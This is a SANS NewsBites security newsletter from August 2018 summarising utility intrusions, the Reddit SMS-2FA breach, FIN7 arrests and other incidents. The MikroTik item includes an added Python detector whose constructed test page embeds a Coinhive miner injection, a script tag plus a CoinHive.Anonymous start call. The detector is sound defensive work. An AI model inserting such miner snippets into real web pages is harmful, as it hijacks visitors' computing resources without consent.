
SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.

Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.

Volume XX - Issue #61

August 3, 2018





  Russian Hackers and US Utilities

  Reddit Data Breached by Intercepting SMS Two-Factor Authentication

  2019 National Defense Authorization Act Would Require US Companies to Disclose Foreign Source Code Reviews


  MikroTik Routers Used to Spread Cryptominer

  Cisco Patches Prime Collaboration Provisioning Password Flaw

  Three Alleged Members of FIN7 Cybercrime Group Arrested

  Conviction in Hospital Cyberattack

  Pentagon's "Do Not Buy" List

  Russian Organizations Targeted in Phishing Scheme

  Malicious WhatsApp Message Used to Target Amnesty International Worker


***************************  Sponsored By Sophos Inc. ************************************

Live Webcast: With 75% of malware unique to a single organization you need to detect never-seen-before threats now. Join us to discover how Intercept X leverages multiple advanced techniques, including deep learning, anti-ransomware and anti-exploit technology, to stop both known and unknown malware in its tracks. Register Today!



-- SANS Network Security 2018 | Las Vegas, NV | September 23-30 | https://www.sans.org/event/network-security-2018

-- Data Breach Summit & Training 2018 | New York, NY | August 20-27 | https://www.sans.org/event/data-breach-summit-2018

-- SANS Virginia Beach 2018 | August 20-31 | https://www.sans.org/event/virginia-beach-2018

-- SANS Amsterdam September 2018 | September 3-8 | https://www.sans.org/event/amsterdam-septembers-2018

-- SANS Tokyo Autumn 2018 | September 3-15 | https://www.sans.org/event/tokyo-autumn-2018

-- Threat Hunting & Incident Response Summit 2018 | New Orleans, LA | September 6-13 | https://www.sans.org/event/threat-hunting-and-incident-response-summit-2018

-- SANS Baltimore Fall 2018 | September 8-15 | https://www.sans.org/event/baltimore-fall-2018

-- SANS London September 2018 | September 17-22 | https://www.sans.org/event/london-september-2018

-- SANS October Singapore 2018 | October 15-27 | https://www.sans.org/event/october-singapore-2018

-- SANS OnDemand and vLive Training

The SANS Training you want with the flexibility you need.

Final Week for Summer Special Offers with Online Training. Get a 10.5-inch iPad Pro, Samsung Galaxy Tab S3 or take $350 Off with Any OnDemand or vLive Course. Offer Ends August 8.


-- Can't travel? SANS offers online instruction for maximum flexibility

-- Live Daytime training with Simulcast | https://www.sans.org/simulcast

-- Evening training 2x per week for 6 weeks with vLive | https://www.sans.org/vlive

-- Anywhere, Anytime access for 4 months with OnDemand format | https://www.sans.org/ondemand/

-- Single Course Training

SANS Mentor |  https://www.sans.org/mentor/about

Community SANS | https://www.sans.org/community/


-- View the full SANS course catalog and Cyber Security Skills Roadmap






--Russian Hackers and US Utilities

(August 2, 2018)

Analysts at Dragos report that a threat group they track as Raspite has gained access to the business networks of several electric utility companies. Dragos says Raspite focuses on companies involved in electricity generation, transmission, and distribution, and that it obtained its initial access through phishing and watering-hole attacks. Targets have been located in the US, the Middle East, Europe, and East Asia. Symantec has identified activity from the same group, which it tracks under the name LeafMiner.

[Editor Comments]

[Murray] The electric grid is our most sensitive infrastructure. In any modern conflict it will be turned on itself. The industry does not have a good cybersecurity record or culture. One expects these compromises to be monetized by selling them to potentially hostile nation states, certainly to include Russia.  

[Neely] Successfully attacking critical infrastructure will supplant the battlefield for critical victories in the future, highlighting the need to prioritize the defenses on these systems. It's not clear if the drive to secure these systems will be outpaced by the desire to implement new convenience interfaces to these same systems. Making security the priority will take fortitude, resources and support from the top in concert with risk-based regulatory requirements.


Read more in:

Dragos: Raspite


The Hill: Hackers breached US electric utilities: analysts



--Reddit Data Breached by Intercepting SMS Two-Factor Authentication

(August 1, 2018)

Reddit has disclosed that an attacker breached its systems in mid-June 2018. The attacker obtained a 2007 database backup containing early user data (usernames, salted and hashed passwords, email addresses, and public and private content from the site's 2005 launch through May 2007), logs of the email digests Reddit sent in early June 2018, and some source code, internal logs, and configuration files. The attacker got in by compromising several Reddit employees' accounts at Reddit's cloud and source code hosting providers: those accounts were protected with SMS-based two-factor authentication (2FA), and the attacker intercepted the SMS codes. In its blog post, Reddit wrote: "We learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA."

[Editor Comments]

[Neely] While we've known there are issues with SMS-based 2FA, it is still better than solely relying on reusable passwords. NIST SP 800-63-3 specifically recommends against it. Fortunately, other more secure options such as token-based 2FA (e.g. Google Auth, MS Authenticator, YubiKey, RSA SecurID, etc.) are becoming more prevalent. Given a choice, select token-based, and when implementing don't enable SMS-based 2FA unless there is no other option.

[Murray] While SMS-based authentication is orders of magnitude stronger than reusable passwords, it is more vulnerable to attack than token-based. However, to date, attacks against it have involved take-over of the phone or phone number, often by social engineering, with the result that the legitimate party does not receive the requested one-time password. These attacks rely upon special knowledge of the association between the target account and the phone number. While less secure than token-based authentication, in many applications and environments SMS is both cheaper and more convenient.


Read more in:

Reddit: We had a security incident. Here's what you need to know.


Wired: Reddit Got Hacked Thanks to a Woefully Insecure Two-Factor Setup


The Register: SMS 2FA gave us sweet FA security, says Reddit: Hackers stole database backup of user account info, posts, messages


Threatpost: Reddit Breach Stems from SMS Two-Factor Authentication Breakdown


KrebsOnSecurity: Reddit Breach Highlights Limits of SMS-Based Authentication


--2019 National Defense Authorization Act Would Require US Companies to Disclose Foreign Source Code Reviews

(August 1, 2018)

The final version of the National Defense Authorization Act (NDAA) for FY2019 includes a provision requiring companies that sell software to the US military to disclose whether they have allowed foreign governments to examine that software's source code. The House of Representatives approved the NDAA last week and the Senate approved it earlier this week.

[Editor Comments]

[Neely] I'm not so sure this will be embraced by US companies trying to do business in those countries. Back in the 1990s, Moscow would not permit their government systems to run any software they had not performed assurance (source and security) reviews on. Since then, controls such as independent third-party review and requiring access to source under tight controls don't eliminate all the risks. US companies need to decide if they wish to follow HPE and McAfee's lead and disallow source code reviews by government agencies.

Read more in:

Reuters: U.S. Congress passes bill forcing tech companies to disclose foreign software probes


FCW: Senate passes 2019 NDAA



**************************  SPONSORED LINKS  ********************************

1) "How Network Traffic Analytics Eliminates Darkspace for the SOC" with Barbara Kay and Chris Crowley. Register:  http://www.sans.org/info/205835

2) Don't Miss "Automating Open Source Security: A SANS Review of WhiteSource" Learn More: http://www.sans.org/info/205840

3) "Break Silos and respond to threats faster; Eliminating network and security silos to speed attack response" Register:  http://www.sans.org/info/205845




--MikroTik Routers Used to Spread Cryptominer

(August 2, 2018)

Attackers have compromised more than 170,000 MikroTik routers, exploiting a vulnerability that MikroTik patched in April 2018, and are using the devices to inject Coinhive cryptomining JavaScript into web pages that pass through them. Because the affected routers are deployed by ISPs and other organizations, a single compromised device can tamper with thousands of web sessions a day. Most of the affected routers so far are in Brazil, but the campaign could spread.

[Editor Comments]

[Ullrich] What is different here compared to prior router attacks is that the router itself isn't doing the crypto coin mining. Instead, the attacker modified HTML error pages that are displayed to users that use this router's HTTP proxy features. Once a user encounters one of the modified pages, JavaScript is used to launch the Coinhive miner in the browser.
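To check whether pages coming back through a suspect network path carry the injected miner, the following added example (not part of the newsletter, and not MikroTik or Coinhive code) parses an HTML body, collects its external and inline scripts, and flags the Coinhive loader script and the CoinHive.Anonymous() call that starts mining in the browser. The two sample pages are constructed for the example, and the indicator list is an assumption: it covers the campaign described here, not every in-browser miner.

```python
"""Flag Coinhive-style miner scripts injected into HTML served via a proxy.

Added example. The sample pages are constructed; the indicator list is an
assumption that covers this campaign's loader and API call only.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

MINER_HOSTS = {"coinhive.com", "www.coinhive.com"}         # loader origin (assumption)
MINER_MARKERS = ("coinhive.min.js", "CoinHive.Anonymous(")  # loader path / start call


class ScriptCollector(HTMLParser):
    """Collects external <script src=...> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline.append(data)


def _script_host(src: str) -> str:
    """Hostname for absolute or protocol-relative URLs; '' for relative paths."""
    url = src if "//" in src else "//" + src
    return (urlparse(url).hostname or "").lower()


def find_injected_miner(html: str):
    """Return [(kind, evidence), ...]; an empty list means no miner indicators."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        if _script_host(src) in MINER_HOSTS or any(m in src for m in MINER_MARKERS):
            findings.append(("external_script", src))
    for body in parser.inline:
        if any(m in body for m in MINER_MARKERS):
            findings.append(("inline_script", " ".join(body.split())[:80]))
    return findings


# Constructed sample pages: an ordinary page, and a proxy error page with the
# miner appended in the way the campaign did (the site key is a placeholder).
CLEAN_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body><h1>Welcome</h1></body></html>"""

INJECTED_ERROR_PAGE = """<html><head><title>Error</title></head>
<body><h1>502 Bad Gateway</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY'); miner.start();</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("error_page", INJECTED_ERROR_PAGE)):
        print(name, "->", find_injected_miner(page) or "no miner indicators")
```

Run it over bodies saved from a proxy log or from `curl` through the network in question; the injection described above shows up on the router's own error pages first, so deliberately requesting an unreachable host is a quick way to fetch one for inspection.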

Read more in:

Threatpost: Huge Cryptomining Attack on ISP-Grade Routers Spreads Globally



--Cisco Patches Prime Collaboration Provisioning Password Flaw

(August 2, 2018)

Cisco has released an update to address a high-severity flaw in its Prime Collaboration Provisioning (PCP) software, versions 12.2 and earlier. The flaw stems from insufficient validation of password change requests and could allow a remote attacker to change users' passwords without authorization, locking legitimate users out; Cisco classifies it as a denial-of-service vulnerability. There are no workarounds; the fix is to upgrade to a patched release.

Read more in:

SC Magazine: Cisco patches password-related vulnerability


Cisco: Cisco Prime Collaboration Provisioning Unauthorized Password Change Denial of Service Vulnerability



--Three Alleged Members of FIN7 Cybercrime Group Arrested

(August 1 & 2, 2018)

The US Department of Justice (DOJ) has indicted three Ukrainian citizens for their alleged roles in a series of attacks on the computer networks of businesses across the US, including Chipotle and Chili's. They face multiple felony charges including conspiracy, wire fraud, computer hacking, access device fraud, and aggravated identity theft. The three are allegedly members of the group known as FIN7, which is also known as Carbanak and JokerStash. The suspects were arrested in Europe; one has been extradited to the US, and the US has requested extradition of the other two.

Read more in:

DOJ: Three Members of Notorious International Cybercrime Group Fin7 In Custody for Role in Attacking Over 100 U.S. companies


The Register: The End for Fin7: Feds cuff suspected super-crooks after $$$m stolen from 15m+ credit cards


Reuters: U.S. charges three Ukrainians in payment card hacking spree


Dark Reading: Feds Indict Three Ukrainians For Cyberattacks on 100+ Companies


Wired: The Wild Inner Workings of a Billion-Dollar Hacking Group



--Conviction in Hospital Cyberattack

(August 1 & 2, 2018)

A federal jury in Massachusetts has found Martin Gottesfeld guilty of conspiracy to damage protected computers and of damaging protected computers. Gottesfeld launched distributed denial-of-service (DDoS) attacks against the networks of a residential treatment facility and of Boston Children's Hospital; the attack on the hospital temporarily knocked its network offline and also affected other hospitals in the area. Gottesfeld carried out the attacks in the name of the Anonymous hacking collective in protest of the hospital's actions in a custody case.

Read more in:

Reuters: Massachusetts man convicted of cyber attack on hospital


Bleeping Computer: Jury Convicts Anonymous Hacker Who DDoSed Children's Hospital, Later Got Lost at Sea


SC Magazine: Sinking feeling: Hacktivist rescued by Disney Cruise ship convicted for DDoS attacks against health facilities



--Pentagon's "Do Not Buy" List

(July 27 & 31, 2018)

The US Department of Defense (DoD) has compiled a "Do Not Buy" list of software vendors whose products are known to contain code of Chinese or Russian origin. The list was created for the Pentagon's contractors and procurement teams. Ellen Lord, Under Secretary of Defense for Acquisition and Sustainment, said the list covers products that fail to meet national security standards. The list itself has not been publicly released, although Kaspersky Lab and ZTE are already known to be banned by the US government.

[Editor Comments]

[Neely] Federal information systems are only supposed to run approved software. Part of that approval is to assess the suitability of the software based on multiple risks including origin and who has access to the source code. Contractors need to follow similar guidelines; this reduces the burden of completing that analysis in-house. The downside is this can lead to discovery of known-bad software in your environment which will need to be methodically and expeditiously replaced to not put current and future contracts in jeopardy.

[Murray] While we have long advocated for the DoD to use its buying power to encourage more secure products, this blanket targeting of vendors is not what we had in mind.

Read more in:

Defense One: Pentagon Creates Do Not Buy List of Russian, Chinese Software


Reuters: Pentagon creating software 'do not buy' list to keep out Russia, China


SC Magazine: Pentagon reveals a Do Not Buy software list as a cybersecurity measure



--Russian Organizations Targeted in Phishing Scheme

(August 1, 2018)

Researchers at Kaspersky Lab have identified a phishing campaign targeting industrial companies, most of them in Russia. The phishing emails are disguised as commercial offers, and the attackers install legitimate remote administration tools (TeamViewer and RMS) on infected machines to gain remote control of them. The campaign has hit nearly 800 computers at more than 400 organizations; its goal appears to be stealing money from the victims' accounts.

Read more in:

Securelist: Attacks on industrial enterprises using RMS and TeamViewer


SC Magazine: Russian spearphishing campaign targeted nearly 800 PCs at more than 400 companies



--Malicious WhatsApp Message Used to Target Amnesty International Worker

(July 31 & August 1, 2018)

A malicious link sent in a WhatsApp message was used in an attempt to infect an Amnesty International staff member's smartphone with Pegasus, the surveillance software that NSO Group sells to government customers. According to an Amnesty International blog post, a Saudi activist received a similar malicious message around the same time. Neither target clicked the link.

[Editor Comments]

[Murray] WhatsApp is no more or less vulnerable to such an attack than most other messaging software. Android is more vulnerable to such an attack than iOS. WhatsApp provides device-to-device encryption in a population of heterogeneous devices. Device-to-device encryption should not be relied upon for life or death applications where person-to-person encryption is indicated.


Read more in:

Amnesty International: Amnesty International Among Targets of NSO-powered Campaign


Citizen Lab: NSO Group Infrastructure Linked to Targeting of Amnesty International and Saudi Dissident


Cyberscoop: Report: Powerful spyware used to target Amnesty International employee and Saudi activist


Threatpost: Amnesty International Targeted by Nation-State Spyware


Motherboard: Powerful Smartphone Malware Used to Target Amnesty International Researcher





Powershell Inside Certificates

Big Star Labs Spyware

Facebook Smishing Attack

Google Improves "Government Sponsored Attacks" Alert for GSuite

Port 52869 UPNP Attacks

Malware in Animated GIF Files

MikroTik Miner Botnet

Microsoft Edge Vulnerability

Microsoft Improves Account Security for Midterm Elections



The Editorial Board of SANS NewsBites


John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.

Shawn Henry is president of CrowdStrike Services. He retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response.

Suzanne Vautrinot was Commander of the 24th Air Force (AF Cyber) and now sits on the board of directors of Wells Fargo and several other major organizations.

Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.

Michael Assante was Vice President and Chief Security Officer at NERC, led a key control systems group at Idaho National Labs, and was American Electric Power's CSO. He now leads the global cyber skills development program at SANS for power, oil & gas and other critical infrastructure industries.

Mark Weatherford is Chief Cybersecurity Strategist at vArmour and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.

Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.

William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.

Lee Neely is a Senior Cyber Analyst at Lawrence Livermore National Laboratory, SANS Analyst and Mentor. He has worked in computer security since 1989.

Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).

Tom Liston is member of the Cyber Network Defense team at UAE-based Dark Matter. He is a Handler for the SANS Institute's Internet Storm Center and co-author of the book Counter Hack Reloaded.

Jake Williams is a SANS course author and the founder of Rendition Infosec, with experience securing DoD, healthcare, and ICS environments.

Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.

Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He leads SANS' efforts to raise the bar in cybersecurity education around the world.

David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.

Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.

Eric Cornelius is Director of Critical Infrastructure and ICS at Cylance, and earlier served as deputy director and chief technical analyst for the Control Systems Security Program at the US Department of Homeland Security.

Alan Paller is director of research at the SANS Institute.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS operations manager and serves as production manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription visit https://www.sans.org/account/create